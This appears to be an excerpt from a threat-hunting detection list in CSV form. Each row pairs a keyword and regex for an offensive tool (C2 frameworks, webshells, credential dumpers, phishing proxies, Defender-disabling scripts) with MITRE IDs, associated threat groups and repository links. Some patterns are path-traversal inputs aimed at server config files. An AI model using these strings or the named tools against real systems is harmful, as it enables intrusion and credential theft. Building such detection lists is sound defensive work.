"*/../../../../../../../../../../../../../../etc/apache2/conf/httpd.conf*",".{0,1000}\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/apache2\/conf\/httpd\.conf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","4987"
"*/../../../../../../../../../../../../../../etc/http/conf/httpd.conf*",".{0,1000}\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/http\/conf\/httpd\.conf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","4988"
"*/../../../../../../../../../../../../../../etc/http/httpd.conf*",".{0,1000}\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/http\/httpd\.conf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","4989"
"*/../../../../../../../../../../../../../../etc/httpd.conf*",".{0,1000}\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/httpd\.conf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","4990"
"*/../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf*",".{0,1000}\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/httpd\/conf\/httpd\.conf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","4991"
"*/../../../../../../../../../../../../../../etc/httpd/httpd.conf*",".{0,1000}\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/httpd\/httpd\.conf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","4992"
"*/../../../../../../../../../../../../../../usr/apache/conf/httpd.conf*",".{0,1000}\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/usr\/apache\/conf\/httpd\.conf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","4993"
"*/../../../../../../../../../../../../../../usr/apache2/conf/httpd.conf*",".{0,1000}\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/usr\/apache2\/conf\/httpd\.conf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","4994"
"*/../../../../../../../../../../../../../../usr/local/etc/apache2/conf/httpd.conf*",".{0,1000}\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/usr\/local\/etc\/apache2\/conf\/httpd\.conf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","4995"
"*/../../../../../../../../../../../../../../usr/local/etc/httpd/conf/httpd.conf*",".{0,1000}\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/usr\/local\/etc\/httpd\/conf\/httpd\.conf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","4996"
"*/../../../../../../../../Volumes/webBackup/opt/apache2/conf/httpd.conf*",".{0,1000}\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/Volumes\/webBackup\/opt\/apache2\/conf\/httpd\.conf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","4997"
"*/../../../../../../../../Volumes/webBackup/private/etc/httpd/httpd.conf.default*",".{0,1000}\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/Volumes\/webBackup\/private\/etc\/httpd\/httpd\.conf\.default.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","4998"
"*/../../../../../../../Volumes/webBackup/private/etc/httpd/httpd.conf*",".{0,1000}\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/Volumes\/webBackup\/private\/etc\/httpd\/httpd\.conf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","4999"
"*/../../../../../boot.ini*",".{0,1000}\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/boot\.ini.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","5000"
"*/.ACEshark*",".{0,1000}\/\.ACEshark.{0,1000}","offensive_tool_keyword","ACEshark","uncover potential privilege escalation vectors by analyzing windows service configurations and Access Control Entries","T1058 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/t3l3machus/ACEshark","1","0","N/A","N/A","6","2","109","19","2025-01-15T07:01:48Z","2024-12-28T10:42:29Z","5001"
"*/.aggressor.prop*",".{0,1000}\/\.aggressor\.prop.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","5002"
"*/.antproxy.php*",".{0,1000}\/\.antproxy\.php.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","1","N/A","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","5003"
"*/.clone.dll*",".{0,1000}\/\.clone\.dll.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","1","N/A","N/A","8","8","748","128","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z","5009"
"*/.cme/cme.conf*",".{0,1000}\/\.cme\/cme\.conf.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","5010"
"*/.config/lsassy*",".{0,1000}\/\.config\/lsassy.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#linux","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","5011"
"*/.dns2tcprc*",".{0,1000}\/\.dns2tcprc.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","#linux","N/A","10","10","191","60","2024-06-08T09:40:52Z","2017-11-23T11:19:53Z","5012"
"*/.evilginx/*",".{0,1000}\/\.evilginx\/.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","#linux","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","5013"
"*/.exegol/*",".{0,1000}\/\.exegol\/.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","5014"
"*/.gspy/databases/*",".{0,1000}\/\.gspy\/databases\/.{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1078.004 - T1110.003 - T1071.001 - T1566.002 - T1656","TA0001 - TA0006 - TA0003 - TA0005 - TA0008","N/A","N/A","Collection","https://github.com/RedByte1337/GraphSpy","1","0","#linux","N/A","10","7","680","72","2025-04-15T21:07:15Z","2024-02-07T19:47:15Z","5016"
"*/.gtunnel.conf*",".{0,1000}\/\.gtunnel\.conf.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","#linux","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","5017"
"*/.link/3rdparty/SharpCollection*",".{0,1000}\/\.link\/3rdparty\/SharpCollection.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","1","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","5018"
"*/.local/bin/graphspy*",".{0,1000}\/\.local\/bin\/graphspy.{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1078.004 - T1110.003 - T1071.001 - T1566.002 - T1656","TA0001 - TA0006 - TA0003 - TA0005 - TA0008","N/A","N/A","Collection","https://github.com/RedByte1337/GraphSpy","1","0","#linux","N/A","10","7","680","72","2025-04-15T21:07:15Z","2024-02-07T19:47:15Z","5019"
"*/.local/share/pacu/*",".{0,1000}\/\.local\/share\/pacu\/.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","#linux","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","5020"
"*/.localxpose/.access*",".{0,1000}\/\.localxpose\/\.access.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","#linux","N/A","10","","N/A","","","","5021"
"*/.manspider/logs*",".{0,1000}\/\.manspider\/logs.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","#linux","N/A","8","10","1117","138","2024-07-18T06:14:04Z","2020-03-18T13:27:20Z","5023"
"*/.manspider/loot*",".{0,1000}\/\.manspider\/loot.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","#linux","N/A","8","10","1117","138","2024-07-18T06:14:04Z","2020-03-18T13:27:20Z","5024"
"*/.MOONWALK*",".{0,1000}\/\.MOONWALK.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","#linux","N/A","10","10","1440","129","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z","5025"
"*/.msf4/*",".{0,1000}\/\.msf4\/.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","5026"
"*/.ntdissector*",".{0,1000}\/\.ntdissector.{0,1000}","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","#linux","N/A","9","2","139","17","2024-08-16T14:18:35Z","2023-09-05T12:13:47Z","5027"
"*/.nxc/obfuscated_scripts/*",".{0,1000}\/\.nxc\/obfuscated_scripts\/.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#linux","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","5028"
"*/.powerview/.powerview_history*",".{0,1000}\/\.powerview\/\.powerview_history.{0,1000}","offensive_tool_keyword","powerview","PowerView.py is an alternative for the awesome original PowerView.ps1","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/aniqfakhrul/powerview.py","1","0","#linux","N/A","10","7","622","66","2025-04-22T09:01:39Z","2022-06-19T16:13:04Z","5029"
"*/.powerview/logs*",".{0,1000}\/\.powerview\/logs.{0,1000}","offensive_tool_keyword","powerview","PowerView.py is an alternative for the awesome original PowerView.ps1","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/aniqfakhrul/powerview.py","1","0","#linux","N/A","10","7","622","66","2025-04-22T09:01:39Z","2022-06-19T16:13:04Z","5030"
"*/.proxychains/*",".{0,1000}\/\.proxychains\/.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","0","#linux","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","5031"
"*/.sliver/logs*",".{0,1000}\/\.sliver\/logs.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","5032"
"*/.sliver-client/*",".{0,1000}\/\.sliver\-client\/.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#linux","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","5033"
"*/.sliver-client/configs*",".{0,1000}\/\.sliver\-client\/configs.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#linux","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","5034"
"*/.spraycharles/logs*",".{0,1000}\/\.spraycharles\/logs.{0,1000}","offensive_tool_keyword","spraycharles","Low and slow password spraying tool","T1110.003 - T1110.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Tw1sm/spraycharles","1","0","#linux","N/A","10","2","195","32","2025-02-09T03:08:09Z","2018-09-17T11:17:47Z","5035"
"*/.spraycharles/out*",".{0,1000}\/\.spraycharles\/out.{0,1000}","offensive_tool_keyword","spraycharles","Low and slow password spraying tool","T1110.003 - T1110.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Tw1sm/spraycharles","1","0","#linux","N/A","10","2","195","32","2025-02-09T03:08:09Z","2018-09-17T11:17:47Z","5036"
"*/.spraycharles:/root/.spraycharles*",".{0,1000}\/\.spraycharles\:\/root\/\.spraycharles.{0,1000}","offensive_tool_keyword","spraycharles","Low and slow password spraying tool","T1110.003 - T1110.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Tw1sm/spraycharles","1","0","#linux","N/A","10","2","195","32","2025-02-09T03:08:09Z","2018-09-17T11:17:47Z","5037"
"*/.ssh/RAI.pub*",".{0,1000}\/\.ssh\/RAI\.pub.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","N/A","10","10","304","53","2024-11-24T16:29:36Z","2018-02-12T16:23:23Z","5039"
"*/.wpscan/*",".{0,1000}\/\.wpscan\/.{0,1000}","offensive_tool_keyword","WPScan","WPScan is a black box WordPress vulnerability scanner.","T1190 - T1210.001 - T1195","TA0007 - TA0010 - ","N/A","ENERGETIC BEAR - EMBER BEAR","Vulnerability Scanner","https://github.com/wpscanteam/wpscan","1","0","#linux","N/A","6","10","8959","1283","2025-04-07T11:27:58Z","2012-07-11T20:27:47Z","5042"
"*// A: the Meterpreter stage is a large shellcode *",".{0,1000}\/\/\sA\:\sthe\sMeterpreter\sstage\sis\sa\slarge\sshellcode\s.{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","C2","https://github.com/Karkas66/CelestialSpark","1","0","#content","N/A","10","10","103","10","2025-03-27T12:47:34Z","2024-04-11T12:17:22Z","5045"
"*// Define IP Adress of your C2 Stager (!)*",".{0,1000}\/\/\sDefine\sIP\sAdress\sof\syour\sC2\sStager\s\(!\).{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/Karkas66/CelestialSpark","1","0","#content","N/A","10","10","103","10","2025-03-27T12:47:34Z","2024-04-11T12:17:22Z","5046"
"*// Discord C2*",".{0,1000}\/\/\sDiscord\sC2.{0,1000}","offensive_tool_keyword","discord-c2","C2 communication with discord","T1102.003 - T1071.001 - T1027.010 - T1105 - T1090.002","TA0011 - TA0010","N/A","N/A","C2","https://github.com/bmdyy/discord-c2","1","0","#content","N/A","10","10","60","6","2022-12-29T03:05:05Z","2022-12-08T19:10:23Z","5047"
"*// Malicious payload should be implemented here*",".{0,1000}\/\/\sMalicious\spayload\sshould\sbe\simplemented\shere.{0,1000}","offensive_tool_keyword","dll-hijack-by-proxying","Exploiting DLL Hijacking by DLL Proxying Super Easily","T1174 - T1574.007","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tothi/dll-hijack-by-proxying","1","0","#content","N/A","7","5","498","103","2023-07-09T22:11:34Z","2020-07-08T18:11:17Z","5048"
"*// William Moody*",".{0,1000}\/\/\sWilliam\sMoody.{0,1000}","offensive_tool_keyword","discord-c2","C2 communication with discord","T1102.003 - T1071.001 - T1027.010 - T1105 - T1090.002","TA0011 - TA0010","N/A","N/A","C2","https://github.com/bmdyy/discord-c2","1","0","#content","N/A","10","10","60","6","2022-12-29T03:05:05Z","2022-12-08T19:10:23Z","5051"
"*//:ptth*",".{0,1000}\/\/\:ptth.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed http://","T1027 - T1059.001","TA0005 - TA0002","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5052"
"*//:sptth""[::-1]*",".{0,1000}\/\/\:sptth\""\[\:\:\-1\].{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection  - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","5053"
"*//:sptth*",".{0,1000}\/\/\:sptth.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed https://","T1027 - T1059.001","TA0005 - TA0002","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5054"
